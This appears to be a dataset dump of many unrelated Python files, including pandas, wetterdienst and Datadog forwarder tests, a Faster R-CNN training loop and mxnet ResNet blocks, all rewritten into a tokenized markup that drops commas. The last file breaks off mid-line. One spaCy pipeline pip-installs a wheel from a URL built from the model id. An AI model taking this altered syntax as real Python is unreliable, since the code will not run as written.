content
stringlengths
0
1.55M
<import_stmt>pytest<import_from_stmt>pandas.errors NullFrequencyError<import_stmt>pandas<as>pd<import_from_stmt>pandas TimedeltaIndex<import_stmt>pandas._testing<as>tm<class_stmt>TestTimedeltaIndexShift# ------------------------------------------------------------- # TimedeltaIndex.shift is used by __add__/__sub__ <block_start><def_stmt>test_tdi_shift_empty self# GH#9903 <block_start>idx=pd.TimedeltaIndex([] name="xxx")<line_sep>tm.assert_index_equal(idx.shift(0 freq="H") idx)<line_sep>tm.assert_index_equal(idx.shift(3 freq="H") idx)<block_end><def_stmt>test_tdi_shift_hours self# GH#9903 <block_start>idx=pd.TimedeltaIndex(["5 hours" "6 hours" "9 hours"] name="xxx")<line_sep>tm.assert_index_equal(idx.shift(0 freq="H") idx)<line_sep>exp=pd.TimedeltaIndex(["8 hours" "9 hours" "12 hours"] name="xxx")<line_sep>tm.assert_index_equal(idx.shift(3 freq="H") exp)<line_sep>exp=pd.TimedeltaIndex(["2 hours" "3 hours" "6 hours"] name="xxx")<line_sep>tm.assert_index_equal(idx.shift(-3 freq="H") exp)<block_end><def_stmt>test_tdi_shift_minutes self# GH#9903 <block_start>idx=pd.TimedeltaIndex(["5 hours" "6 hours" "9 hours"] name="xxx")<line_sep>tm.assert_index_equal(idx.shift(0 freq="T") idx)<line_sep>exp=pd.TimedeltaIndex(["05:03:00" "06:03:00" "9:03:00"] name="xxx")<line_sep>tm.assert_index_equal(idx.shift(3 freq="T") exp)<line_sep>exp=pd.TimedeltaIndex(["04:57:00" "05:57:00" "8:57:00"] name="xxx")<line_sep>tm.assert_index_equal(idx.shift(-3 freq="T") exp)<block_end><def_stmt>test_tdi_shift_int self# GH#8083 <block_start>tdi=pd.to_timedelta(range(5) unit="d")<line_sep>trange=tdi._with_freq("infer")+pd.offsets.Hour(1)<line_sep>result=trange.shift(1)<line_sep>expected=TimedeltaIndex(["1 days 01:00:00" "2 days 01:00:00" "3 days 01:00:00" "4 days 01:00:00" "5 days 01:00:00" ] freq="D" )<line_sep>tm.assert_index_equal(result expected)<block_end><def_stmt>test_tdi_shift_nonstandard_freq self# GH#8083 <block_start>tdi=pd.to_timedelta(range(5) unit="d")<line_sep>trange=tdi._with_freq("infer")+pd.offsets.Hour(1)<line_sep>result=trange.shift(3 freq="2D 1s")<line_sep>expected=TimedeltaIndex(["6 days 01:00:03" "7 days 01:00:03" "8 days 01:00:03" "9 days 01:00:03" "10 days 01:00:03" ] freq="D" )<line_sep>tm.assert_index_equal(result expected)<block_end><def_stmt>test_shift_no_freq self# GH#19147 <block_start>tdi=TimedeltaIndex(["1 days 01:00:00" "2 days 01:00:00"] freq=<none>)<with_stmt>pytest.raises(NullFrequencyError match="Cannot shift with no freq")<block_start>tdi.shift(2)<block_end><block_end><block_end>
<import_stmt>os<import_from_stmt>subprocess check_output CalledProcessError<import_from_stmt>nose tools<as>nt<import_from_stmt>stolos queue_backend<as>qb<import_from_stmt>stolos.testing_tools with_setup validate_zero_queued_task validate_one_queued_task validate_n_queued_task <def_stmt>run cmd tasks_json_tmpfile **kwargs<block_start>cmd=("set -o pipefail ; STOLOS_TASKS_JSON={tasks_json} {cmd}").format(cmd=cmd tasks_json=tasks_json_tmpfile **kwargs)<line_sep>rv=check_output(cmd shell=<true> executable="bash" env=os.environ)<line_sep><return>rv<block_end>@with_setup<def_stmt>test_stolos_submit app1 job_id1 tasks_json_tmpfile<block_start><with_stmt>nt.assert_raises(CalledProcessError)<block_start>run("stolos-submit -h" tasks_json_tmpfile)<block_end>validate_zero_queued_task(app1)<line_sep>run("stolos-submit -a %s -j %s"%(app1 job_id1) tasks_json_tmpfile)<line_sep>validate_one_queued_task(app1 job_id1)<line_sep>run("stolos-submit -a %s -j %s"%(app1 job_id1) tasks_json_tmpfile)<line_sep>validate_one_queued_task(app1 job_id1)<block_end>@with_setup<def_stmt>test_stolos_submit_readd app1 job_id1 tasks_json_tmpfile<block_start>qb.set_state(app1 job_id1 failed=<true>)<line_sep>validate_zero_queued_task(app1)<line_sep>run("stolos-submit -a %s -j %s"%(app1 job_id1) tasks_json_tmpfile)<line_sep>validate_zero_queued_task(app1)<line_sep>run("stolos-submit -a %s -j %s --readd"%(app1 job_id1) tasks_json_tmpfile)<line_sep>validate_one_queued_task(app1 job_id1)<block_end>@with_setup<def_stmt>test_stolos_submit_multiple_jobs app1 app2 job_id1 job_id2 tasks_json_tmpfile<block_start>validate_zero_queued_task(app1)<line_sep>validate_zero_queued_task(app2)<line_sep>run("stolos-submit -a %s %s -j %s %s"%(app1 app2 job_id1 job_id2) tasks_json_tmpfile)<line_sep>validate_n_queued_task(app1 job_id1 job_id2)<line_sep>validate_n_queued_task(app2 job_id1 job_id2)<line_sep>run("stolos-submit -a %s %s -j %s %s"%(app1 app2 job_id1 job_id2) tasks_json_tmpfile)<line_sep>validate_n_queued_task(app1 job_id1 job_id2)<line_sep>validate_n_queued_task(app2 job_id1 job_id2)<block_end>
# -*- coding: utf-8 -*- # Copyright (c) 2018-2021, earthobservations developers. # Distributed under the MIT License. See LICENSE for more info. <import_stmt>pytest<import_from_stmt>wetterdienst Wetterdienst<line_sep>@pytest.mark.remote@pytest.mark.parametrize("provider,kind,kwargs" [# German Weather Service (DWD) ("dwd" "observation" {"parameter":"kl" "resolution":"daily" "period":"recent"} ) ("dwd" "forecast" {"parameter":"large" "mosmix_type":"large"}) # Environment and Climate Change Canada ("eccc" "observation" {"parameter":"daily" "resolution":"daily"}) ] )@pytest.mark.parametrize("si_units" (<false> <true>))<def_stmt>test_api provider kind kwargs si_units<block_start>""" Test main wetterdienst API """<line_sep># Build API api=Wetterdienst(provider kind)<line_sep># Discover parameters <assert_stmt>api.discover()<line_sep># All stations request=api(**kwargs si_units=si_units).all()<line_sep>stations=request.df<line_sep># Check stations DataFrame columns <assert_stmt>set(stations.columns).issuperset({"station_id" "from_date" "to_date" "height" "latitude" "longitude" "name" "state" })<line_sep># Check that there are actually stations <assert_stmt><not>stations.empty<line_sep># Query first DataFrame from values values=next(request.values.query()).df<line_sep># TODO: DWD Forecast has no quality <assert_stmt>set(values.columns).issuperset({"station_id" "parameter" "date" "value" "quality"})<assert_stmt><not>values.empty<block_end>
<import_from_stmt>pathlib Path<import_from_stmt>.anki_exporter AnkiJsonExporter<import_from_stmt>..anki.adapters.anki_deck AnkiDeck<import_from_stmt>..config.config_settings ConfigSettings<import_from_stmt>..utils constants<import_from_stmt>..utils.notifier AnkiModalNotifier Notifier<import_from_stmt>..utils.disambiguate_uuids disambiguate_note_model_uuids<line_sep>EXPORT_FAILED_TITLE="Export failed"<class_stmt>AnkiJsonExporterWrapper<block_start>""" Wrapper designed to work with standard export dialog in anki. """<line_sep>key="CrowdAnki JSON representation"<line_sep>ext=constants.ANKI_EXPORT_EXTENSION<line_sep>hideTags=<true><line_sep>includeTags=<true><line_sep>directory_export=<true><def_stmt>__init__ self collection deck_id:int=<none> json_exporter:AnkiJsonExporter=<none> notifier:Notifier=<none><block_start>self.includeMedia=<true><line_sep>self.did=deck_id<line_sep>self.count=0# Todo? self.collection=collection<line_sep>self.anki_json_exporter=json_exporter<or>AnkiJsonExporter(collection ConfigSettings.get_instance())<line_sep>self.notifier=notifier<or>AnkiModalNotifier()<block_end># required by anki exporting interface with its non-PEP-8 names # noinspection PyPep8Naming <def_stmt>exportInto self directory_path<block_start><if_stmt>self.did<is><none><block_start>self.notifier.warning(EXPORT_FAILED_TITLE "CrowdAnki export works only for specific decks. "<concat>"Please use CrowdAnki snapshot if you want to export "<concat>"the whole collection.")<line_sep><return><block_end>deck=AnkiDeck(self.collection.decks.get(self.did default=<false>))<if_stmt>deck.is_dynamic<block_start>self.notifier.warning(EXPORT_FAILED_TITLE "CrowdAnki does not support export for dynamic decks.")<line_sep><return><block_end># Clean up duplicate note models. See # https://github.com/Stvad/CrowdAnki/wiki/Workarounds-%E2%80%94-Duplicate-note-model-uuids. disambiguate_note_model_uuids(self.collection)<line_sep># .parent because we receive name with random numbers at the end (hacking around internals of Anki) :( export_path=Path(directory_path).parent<line_sep>self.anki_json_exporter.export_to_directory(deck export_path self.includeMedia create_deck_subdirectory=ConfigSettings.get_instance().export_create_deck_subdirectory)<line_sep>self.count=self.anki_json_exporter.last_exported_count<block_end><block_end><def_stmt>get_exporter_id exporter<block_start><return>f"{exporter.key} (*{exporter.ext})" exporter<block_end><def_stmt>exporters_hook exporters_list<block_start>exporter_id=get_exporter_id(AnkiJsonExporterWrapper)<if_stmt>exporter_id<not><in>exporters_list<block_start>exporters_list.append(exporter_id)<block_end><block_end>
# -*- coding: utf-8 -*- <import_stmt>logging<if_stmt>__name__<eq>'__main__'<block_start>logging.basicConfig()<block_end>_log=logging.getLogger(__name__)<import_stmt>pyxb.binding.generate<import_stmt>pyxb.binding.datatypes<as>xs<import_stmt>pyxb.binding.basis<import_stmt>pyxb.utils.domutils<import_stmt>os.path<line_sep>xsd='''<?xml version="1.0" encoding="UTF-8"?> <xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:simpleType name="foo"/> </xs:schema>'''<import_from_stmt>pyxb.exceptions_ *<import_stmt>unittest<class_stmt>TestTrac_200908181430(unittest.TestCase)<block_start><def_stmt>testParsing self<block_start>self.assertRaises(pyxb.SchemaValidationError pyxb.binding.generate.GeneratePython schema_text=xsd)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<import_from_stmt>keras backend<as>K<import_from_stmt>tqdm tqdm<def_stmt>write_log callback names logs batch_no<block_start><for_stmt>name,value zip(names logs)<block_start>summary=tf.Summary()<line_sep>summary_value=summary.value.add()<line_sep>summary_value.simple_value=value<line_sep>summary_value.tag=name<line_sep>callback.writer.add_summary(summary batch_no)<line_sep>callback.writer.flush()<block_end><block_end><def_stmt>fit_one_epoch model_rpn model_all loss_history callback epoch epoch_step epoch_step_val gen gen_val Epoch anchors bbox_util roi_helper<block_start>total_loss=0<line_sep>rpn_loc_loss=0<line_sep>rpn_cls_loss=0<line_sep>roi_loc_loss=0<line_sep>roi_cls_loss=0<line_sep>val_loss=0<with_stmt>tqdm(total=epoch_step desc=f'Epoch {epoch+1}/{Epoch}' postfix=dict mininterval=0.3)<as>pbar<block_start><for_stmt>iteration,batch enumerate(gen)<block_start><if_stmt>iteration<ge>epoch_step<block_start><break><block_end>X,Y,boxes=batch[0] batch[1] batch[2]<line_sep>P_rpn=model_rpn.predict_on_batch(X)<line_sep>results=bbox_util.detection_out_rpn(P_rpn anchors)<line_sep>roi_inputs=[]<line_sep>out_classes=[]<line_sep>out_regrs=[]<for_stmt>i range(len(X))<block_start>R=results[i]<line_sep>X2,Y1,Y2=roi_helper.calc_iou(R boxes[i])<line_sep>roi_inputs.append(X2)<line_sep>out_classes.append(Y1)<line_sep>out_regrs.append(Y2)<block_end>loss_class=model_all.train_on_batch([X np.array(roi_inputs)] [Y[0] Y[1] np.array(out_classes) np.array(out_regrs)])<line_sep>write_log(callback ['total_loss' 'rpn_cls_loss' 'rpn_reg_loss' 'detection_cls_loss' 'detection_reg_loss'] loss_class iteration)<line_sep>rpn_cls_loss<augadd>loss_class[1]<line_sep>rpn_loc_loss<augadd>loss_class[2]<line_sep>roi_cls_loss<augadd>loss_class[3]<line_sep>roi_loc_loss<augadd>loss_class[4]<line_sep>total_loss=rpn_loc_loss+rpn_cls_loss+roi_loc_loss+roi_cls_loss<line_sep>pbar.set_postfix(**{'total':total_loss/(iteration+1) 'rpn_cls':rpn_cls_loss/(iteration+1) 'rpn_loc':rpn_loc_loss/(iteration+1) 'roi_cls':roi_cls_loss/(iteration+1) 'roi_loc':roi_loc_loss/(iteration+1) 'lr':K.get_value(model_rpn.optimizer.lr)})<line_sep>pbar.update(1)<block_end><block_end>print('Start Validation')<with_stmt>tqdm(total=epoch_step_val desc=f'Epoch {epoch+1}/{Epoch}' postfix=dict mininterval=0.3)<as>pbar<block_start><for_stmt>iteration,batch enumerate(gen_val)<block_start><if_stmt>iteration<ge>epoch_step_val<block_start><break><block_end>X,Y,boxes=batch[0] batch[1] batch[2]<line_sep>P_rpn=model_rpn.predict_on_batch(X)<line_sep>results=bbox_util.detection_out_rpn(P_rpn anchors)<line_sep>roi_inputs=[]<line_sep>out_classes=[]<line_sep>out_regrs=[]<for_stmt>i range(len(X))<block_start>R=results[i]<line_sep>X2,Y1,Y2=roi_helper.calc_iou(R boxes[i])<line_sep>roi_inputs.append(X2)<line_sep>out_classes.append(Y1)<line_sep>out_regrs.append(Y2)<block_end>loss_class=model_all.test_on_batch([X np.array(roi_inputs)] [Y[0] Y[1] np.array(out_classes) np.array(out_regrs)])<line_sep>val_loss<augadd>loss_class[0]<line_sep>pbar.set_postfix(**{'total':val_loss/(iteration+1)})<line_sep>pbar.update(1)<block_end><block_end>logs={'loss':total_loss/epoch_step 'val_loss':val_loss/epoch_step_val}<line_sep>loss_history.on_epoch_end([] logs)<line_sep>print('Epoch:'+str(epoch+1)+'/'+str(Epoch))<line_sep>print('Total Loss: %.3f || Val Loss: %.3f '%(total_loss/epoch_step val_loss/epoch_step_val))<line_sep>model_all.save_weights('logs/ep%03d-loss%.3f-val_loss%.3f.h5'%(epoch+1 total_loss/epoch_step val_loss/epoch_step_val))<block_end>
# Copyright (C) 2020-2022 Intel Corporation # SPDX-License-Identifier: Apache-2.0 <import_from_stmt>.pattern_utils check_fused_scale_shift_patterns get_fused_scale_shift_patterns check_fused_op_const_patterns get_fused_op_const_pattern get_clamp_mult_const_pattern<def_stmt>get_gpu_ignored_patterns <block_start><return>{'blocks':[(pattern check_fused_scale_shift_patterns)<for>pattern get_fused_scale_shift_patterns()]+[(pattern check_fused_op_const_patterns)<for>pattern get_fused_op_const_pattern()] 'activations':[get_clamp_mult_const_pattern()] 'inputs':[]}<block_end>
<import_from_stmt>typing Tuple<import_stmt>torch<class_stmt>RunningMeanStd<block_start>""" Utility Function to compute a running mean and variance calculator :param epsilon: Small number to prevent division by zero for calculations :param shape: Shape of the RMS object :type epsilon: float :type shape: Tuple """<def_stmt>__init__ self epsilon:float=1e-4 shape:Tuple=()<block_start>self.mean=torch.zeros(shape).double()<line_sep>self.var=torch.ones(shape).double()<line_sep>self.count=epsilon<block_end><def_stmt>update self batch:torch.Tensor<block_start>batch_mean=torch.mean(batch axis=0)<line_sep>batch_var=torch.var(batch axis=0)<line_sep>batch_count=batch.shape[0]<line_sep>total_count=self.count+batch_count<line_sep>delta=batch_mean-self.mean<line_sep>new_mean=self.mean+delta<times>batch_count/total_count<line_sep>M2=(self.var<times>self.count+batch_var<times>batch_count+(delta<power>2)<times>self.count<times>batch_count/total_count)<line_sep>self.mean=new_mean<line_sep>self.var=M2/(total_count-1)<line_sep>self.count=total_count<block_end><block_end>
<import_stmt>os<import_stmt>subprocess<import_stmt>sys<import_from_stmt>typing Dict List<import_from_stmt>app.pipelines Pipeline<class_stmt>TextClassificationPipeline(Pipeline)<block_start><def_stmt>__init__ self model_id:str # At the time, only public models from spaCy are allowed in the inference API. <block_start>full_model_path=model_id.split("/")<if_stmt>len(full_model_path)<ne>2<block_start><raise>ValueError(f"Invalid model_id: {model_id}. It should have a namespace (:namespace:/:model_name:)")<block_end>namespace,model_name=full_model_path<line_sep>package=f"https://huggingface.co/{namespace}/{model_name}/resolve/main/{model_name}-any-py3-none-any.whl"<line_sep>cache_dir=os.environ["PIP_CACHE"]<line_sep>subprocess.check_call([sys.executable "-m" "pip" "install" "--cache-dir" cache_dir package])<import_stmt>spacy<line_sep>self.model=spacy.load(model_name)<block_end><def_stmt>__call__ self inputs:str<arrow>List[List[Dict[str float]]]<block_start>""" Args: inputs (:obj:`str`): a string containing some text Return: A :obj:`list`:. The object returned should be a list of one list like [[{"label": 0.9939950108528137}]] containing : - "label": A string representing what the label/class is. There can be multiple labels. - "score": A score between 0 and 1 describing how confident the model is for this label/class. """<line_sep>doc=self.model(inputs)<line_sep>categories=[]<for_stmt>cat,score doc.cats.items()<block_start>categories.append({"label":cat "score":score})<block_end><return>[categories]<block_end><block_end>
<import_from_stmt>unittest.mock MagicMock patch<import_stmt>os<import_stmt>sys<import_stmt>unittest<import_stmt>json<import_stmt>copy<import_stmt>io<import_stmt>gzip<line_sep>sys.modules["trace_forwarder.connection"]=MagicMock()<line_sep>sys.modules["datadog_lambda.wrapper"]=MagicMock()<line_sep>sys.modules["datadog_lambda.metric"]=MagicMock()<line_sep>sys.modules["datadog"]=MagicMock()<line_sep>sys.modules["requests"]=MagicMock()<line_sep>sys.modules["requests_futures.sessions"]=MagicMock()<line_sep>env_patch=patch.dict(os.environ {"DD_API_KEY":"11111111111111111111111111111111" "DD_ADDITIONAL_TARGET_LAMBDAS":"ironmaiden,megadeth" } )<line_sep>env_patch.start()<import_stmt>lambda_function<import_stmt>parsing<line_sep>env_patch.stop()<class_stmt>Context<block_start>function_version=0<line_sep>invoked_function_arn="invoked_function_arn"<line_sep>function_name="function_name"<line_sep>memory_limit_in_mb="10"<block_end>test_data={"Records":[{"eventVersion":"1.08" "userIdentity":{"type":"AssumedRole" "principalId":"AROAYYB64AB3HGPQO2EPR:DatadogAWSIntegration" "arn":"arn:aws:sts::601427279990:assumed-role/Siti_DatadogAWSIntegrationRole/i-08014e4f62ccf762d" "accountId":"601427279990" "accessKeyId":"ASIAYYB64AB3DWOY7JNT" "sessionContext":{"sessionIssuer":{"type":"Role" "principalId":"AROAYYB64AB3HGPQO2EPR" "arn":"arn:aws:iam::601427279990:role/Siti_DatadogAWSIntegrationRole" "accountId":"601427279990" "userName":"Siti_DatadogAWSIntegrationRole" } "attributes":{"creationDate":"2021-05-02T23:49:01Z" "mfaAuthenticated":"false" } } } "eventTime":"2021-05-02T23:53:28Z" "eventSource":"dynamodb.amazonaws.com" "eventName":"DescribeTable" "awsRegion":"us-east-1" "sourceIPAddress":"172.16.31.10" "userAgent":"Datadog" "requestParameters":{"tableName":"KinesisClientLibraryLocal"} "responseElements":<none> "requestID":"A9K7562IBO4MPDQE4O5G9QETRFVV4KQNSO5AEMVJF66Q9ASUAAJG" "eventID":"a5dd11f9-f616-4ea8-8030-0b3eef554352" "readOnly":<true> "resources":[{"accountId":"601427279990" "type":"AWS::DynamoDB::Table" "ARN":"arn:aws:dynamodb:us-east-1:601427279990:table/KinesisClientLibraryLocal" }] "eventType":"AwsApiCall" "apiVersion":"2012-08-10" "managementEvent":<true> "recipientAccountId":"601427279990" "eventCategory":"Management" }]}<def_stmt>test_data_gzipped <arrow>io.BytesIO<block_start><return>io.BytesIO(gzip.compress(json.dumps(copy.deepcopy(test_data)).encode("utf-8")))<block_end><class_stmt>TestS3CloudwatchParsing(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self.maxDiff=9000<block_end>@patch("parsing.boto3")@patch("lambda_function.boto3")<def_stmt>test_s3_cloudtrail_pasing_and_enrichment self lambda_boto3 parsing_boto3<block_start>context=Context()<line_sep>boto3=parsing_boto3.client()<line_sep>boto3.get_object.return_value={"Body":test_data_gzipped()}<line_sep>payload={"s3":{"bucket":{"name":"test-bucket" } "object":{"key":"<KEY>"} }}<line_sep>result=parsing.parse({"Records":[payload]} context)<line_sep>expected=copy.deepcopy([test_data["Records"][0]])<line_sep>expected[0].update({"ddsource":"cloudtrail" "ddsourcecategory":"aws" "service":"cloudtrail" "aws":{"s3":{"bucket":payload["s3"]["bucket"]["name"] "key":payload["s3"]["object"]["key"] } "function_version":context.function_version "invoked_function_arn":context.invoked_function_arn } })<line_sep># yeah, there are tags, but we don't care to compare them result[0].pop("ddtags")<line_sep># expected parsed result, now testing enrichment self.assertEqual(expected[0] result[0])<line_sep>expected[0]["host"]="i-08014e4f62ccf762d"<line_sep>self.assertEqual(expected[0] lambda_function.enrich(result)[0])<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end>
<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>mxnet<as>mx<import_stmt>numpy<as>np<import_from_stmt>config config<def_stmt>Conv **kwargs<block_start>body=mx.sym.Convolution(**kwargs)<line_sep><return>body<block_end><def_stmt>Act data act_type name<block_start><if_stmt>act_type<eq>'prelu'<block_start>body=mx.sym.LeakyReLU(data=data act_type='prelu' name=name)<block_end><else_stmt><block_start>body=mx.symbol.Activation(data=data act_type=act_type name=name)<block_end><return>body<block_end><def_stmt>ConvFactory data num_filter kernel stride=(1 1) pad=(0 0) act_type="relu" mirror_attr={} with_act=<true> dcn=<false> name=''<block_start>bn_mom=config.bn_mom<line_sep>workspace=config.workspace<if_stmt><not>dcn<block_start>conv=mx.symbol.Convolution(data=data num_filter=num_filter kernel=kernel stride=stride pad=pad no_bias=<true> workspace=workspace name=name+'_conv')<block_end><else_stmt><block_start>conv_offset=mx.symbol.Convolution(name=name+'_conv_offset' data=data num_filter=18 pad=(1 1) kernel=(3 3) stride=(1 1))<line_sep>conv=mx.contrib.symbol.DeformableConvolution(name=name+"_conv" data=data offset=conv_offset num_filter=num_filter pad=(1 1) kernel=(3 3) num_deformable_group=1 stride=stride dilate=(1 1) no_bias=<false>)<block_end>bn=mx.symbol.BatchNorm(data=conv fix_gamma=<false> momentum=bn_mom eps=2e-5 name=name+'_bn')<if_stmt>with_act<block_start>act=Act(bn act_type name=name+'_relu')<line_sep>#act = mx.symbol.Activation( # data=bn, act_type=act_type, attr=mirror_attr, name=name+'_relu') <return>act<block_end><else_stmt><block_start><return>bn<block_end><block_end><def_stmt>conv_resnet data num_filter stride dim_match name binarize dcn dilate **kwargs<block_start>bit=1<line_sep>ACT_BIT=config.ACT_BIT<line_sep>bn_mom=config.bn_mom<line_sep>workspace=config.workspace<line_sep>memonger=config.memonger<line_sep>#print('in unit2') # the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper bn1=mx.sym.BatchNorm(data=data fix_gamma=<false> eps=2e-5 momentum=bn_mom name=name+'_bn1')<if_stmt><not>binarize<block_start>act1=Act(data=bn1 act_type='relu' name=name+'_relu1')<line_sep>conv1=Conv(data=act1 num_filter=int(num_filter<times>0.5) kernel=(1 1) stride=(1 1) pad=(0 0) no_bias=<true> workspace=workspace name=name+'_conv1')<block_end><else_stmt><block_start>act1=mx.sym.QActivation(data=bn1 act_bit=ACT_BIT name=name+'_relu1' backward_only=<true>)<line_sep>conv1=mx.sym.QConvolution(data=act1 num_filter=int(num_filter<times>0.5) kernel=(1 1) stride=(1 1) pad=(0 0) no_bias=<true> workspace=workspace name=name+'_conv1' act_bit=ACT_BIT weight_bit=bit)<block_end>bn2=mx.sym.BatchNorm(data=conv1 fix_gamma=<false> eps=2e-5 momentum=bn_mom name=name+'_bn2')<if_stmt><not>binarize<block_start>act2=Act(data=bn2 act_type='relu' name=name+'_relu2')<line_sep>conv2=Conv(data=act2 num_filter=int(num_filter<times>0.5) kernel=(3 3) stride=(1 1) pad=(1 1) no_bias=<true> workspace=workspace name=name+'_conv2')<block_end><else_stmt><block_start>act2=mx.sym.QActivation(data=bn2 act_bit=ACT_BIT name=name+'_relu2' backward_only=<true>)<line_sep>conv2=mx.sym.QConvolution(data=act2 num_filter=int(num_filter<times>0.5) kernel=(3 3) stride=(1 1) pad=(1 1) no_bias=<true> workspace=workspace name=name+'_conv2' act_bit=ACT_BIT weight_bit=bit)<block_end>bn3=mx.sym.BatchNorm(data=conv2 fix_gamma=<false> eps=2e-5 momentum=bn_mom name=name+'_bn3')<if_stmt><not>binarize<block_start>act3=Act(data=bn3 act_type='relu' name=name+'_relu3')<line_sep>conv3=Conv(data=act3 num_filter=num_filter kernel=(1 1) stride=(1 1) pad=(0 0) no_bias=<true> workspace=workspace name=name+'_conv3')<block_end><else_stmt><block_start>act3=mx.sym.QActivation(data=bn3 act_bit=ACT_BIT name=name+'_relu3' backward_only=<true>)<line_sep>conv3=mx.sym.QConvolution(data=act3 num_filter=num_filter kernel=(1 1) stride=(1 1) pad=(0 0) no_bias=<true> workspace=workspace name=name+'_conv3' act_bit=ACT_BIT weight_bit=bit)<block_end>#if binarize: # conv3 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4') <if_stmt>dim_match<block_start>shortcut=data<block_end><else_stmt><block_start><if_stmt><not>binarize<block_start>shortcut=Conv(data=act1 num_filter=num_filter kernel=(1 1) stride=stride no_bias=<true> workspace=workspace name=name+'_sc')<block_end><else_stmt><block_start>shortcut=mx.sym.QConvolution(data=act1 num_filter=num_filter kernel=(1 1) stride=stride pad=(0 0) no_bias=<true> workspace=workspace name=name+'_sc' act_bit=ACT_BIT weight_bit=bit)<block_end><block_end><if_stmt>memonger<block_start>shortcut._set_attr(mirror_stage='True')<block_end><return>conv3+shortcut<block_end><def_stmt>conv_hpm data num_filter stride dim_match name binarize dcn dilation **kwargs<block_start>bit=1<line_sep>ACT_BIT=config.ACT_BIT<line_sep>bn_mom=config.bn_mom<line_sep>workspace=config.workspace<line_sep>memonger=config.memonger<line_sep>#print('in unit2') # the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper bn1=mx.sym.BatchNorm(data=data fix_gamma=<false> eps=2e-5 momentum=bn_mom name=name+'_bn1')<if_stmt><not>binarize<block_start>act1=Act(data=bn1 act_type='relu' name=name+'_relu1')<if_stmt><not>dcn<block_start>conv1=Conv(data=act1 num_filter=int(num_filter<times>0.5) kernel=(3 3) stride=(1 1) pad=(dilation dilation) dilate=(dilation dilation) no_bias=<true> workspace=workspace name=name+'_conv1')<block_end><else_stmt><block_start>conv1_offset=mx.symbol.Convolution(name=name+'_conv1_offset' data=act1 num_filter=18 pad=(1 1) kernel=(3 3) stride=(1 1))<line_sep>conv1=mx.contrib.symbol.DeformableConvolution(name=name+'_conv1' data=act1 offset=conv1_offset num_filter=int(num_filter<times>0.5) pad=(1 1) kernel=(3 3) num_deformable_group=1 stride=(1 1) dilate=(1 1) no_bias=<true>)<block_end><block_end><else_stmt><block_start>act1=mx.sym.QActivation(data=bn1 act_bit=ACT_BIT name=name+'_relu1' backward_only=<true>)<line_sep>conv1=mx.sym.QConvolution_v1(data=act1 num_filter=int(num_filter<times>0.5) kernel=(3 3) stride=(1 1) pad=(1 1) no_bias=<true> workspace=workspace name=name+'_conv1' act_bit=ACT_BIT weight_bit=bit)<block_end>bn2=mx.sym.BatchNorm(data=conv1 fix_gamma=<false> eps=2e-5 momentum=bn_mom name=name+'_bn2')<if_stmt><not>binarize<block_start>act2=Act(data=bn2 act_type='relu' name=name+'_relu2')<if_stmt><not>dcn<block_start>conv2=Conv(data=act2 num_filter=int(num_filter<times>0.25) kernel=(3 3) stride=(1 1) pad=(dilation dilation) dilate=(dilation dilation) no_bias=<true> workspace=workspace name=name+'_conv2')<block_end><else_stmt><block_start>conv2_offset=mx.symbol.Convolution(name=name+'_conv2_offset' data=act2 num_filter=18 pad=(1 1) kernel=(3 3) stride=(1 1))<line_sep>conv2=mx.contrib.symbol.DeformableConvolution(name=name+'_conv2' data=act2 offset=conv2_offset num_filter=int(num_filter<times>0.25) pad=(1 1) kernel=(3 3) num_deformable_group=1 stride=(1 1) dilate=(1 1) no_bias=<true>)<block_end><block_end><else_stmt><block_start>act2=mx.sym.QActivation(data=bn2 act_bit=ACT_BIT name=name+'_relu2' backward_only=<true>)<line_sep>conv2=mx.sym.QConvolution_v1(data=act2 num_filter=int(num_filter<times>0.25) kernel=(3 3) stride=(1 1) pad=(1 1) no_bias=<true> workspace=workspace name=name+'_conv2' act_bit=ACT_BIT weight_bit=bit)<block_end>bn3=mx.sym.BatchNorm(data=conv2 fix_gamma=<false> eps=2e-5 momentum=bn_mom name=name+'_bn3')<if_stmt><not>binarize<block_start>act3=Act(data=bn3 act_type='relu' name=name+'_relu3')<if_stmt><not>dcn<block_start>conv3=Conv(data=act3 num_filter=int(num_filter<times>0.25) kernel=(3 3) stride=(1 1) pad=(dilation dilation) dilate=(dilation dilation) no_bias=<true> workspace=workspace name=name+'_conv3')<block_end><else_stmt><block_start>conv3_offset=mx.symbol.Convolution(name=name+'_conv3_offset' data=act3 num_filter=18 pad=(1 1) kernel=(3 3) stride=(1 1))<line_sep>conv3=mx.contrib.symbol.DeformableConvolution(name=name+'_conv3' data=act3 offset=conv3_offset num_filter=int(num_filter<times>0.25) pad=(1 1) kernel=(3 3) num_deformable_group=1 stride=(1 1) dilate=(1 1) no_bias=<true>)<block_end><block_end><else_stmt><block_start>act3=mx.sym.QActivation(data=bn3 act_bit=ACT_BIT name=name+'_relu3' backward_only=<true>)<line_sep>conv3=mx.sym.QConvolution_v1(data=act3 num_filter=int(num_filter<times>0.25) kernel=(3 3) stride=(1 1) pad=(1 1) no_bias=<true> workspace=workspace name=name+'_conv3' act_bit=ACT_BIT weight_bit=bit)<block_end>conv4=mx.symbol.Concat(*[conv1 conv2 conv3])<if_stmt>binarize<block_start>conv4=mx.sym.BatchNorm(data=conv4 fix_gamma=<false> eps=2e-5 momentum=bn_mom name=name+'_bn4')<block_end><if_stmt>dim_match<block_start>shortcut=data<block_end><else_stmt><block_start><if_stmt><not>binarize<block_start>shortcut=Conv(data=act1 num_filter=num_filter kernel=(1 1) stride=stride no_bias=<true> workspace=workspace name=name+'_sc')<block_end><else_stmt>#assert(False) <block_start>shortcut=mx.sym.QConvolution_v1(data=act1 num_filter=num_filter kernel=(1 1) stride=stride pad=(0 0) no_bias=<true> workspace=workspace name=name+'_sc' act_bit=ACT_BIT weight_bit=bit)<line_sep>shortcut=mx.sym.BatchNorm(data=shortcut fix_gamma=<false> eps=2e-5 momentum=bn_mom 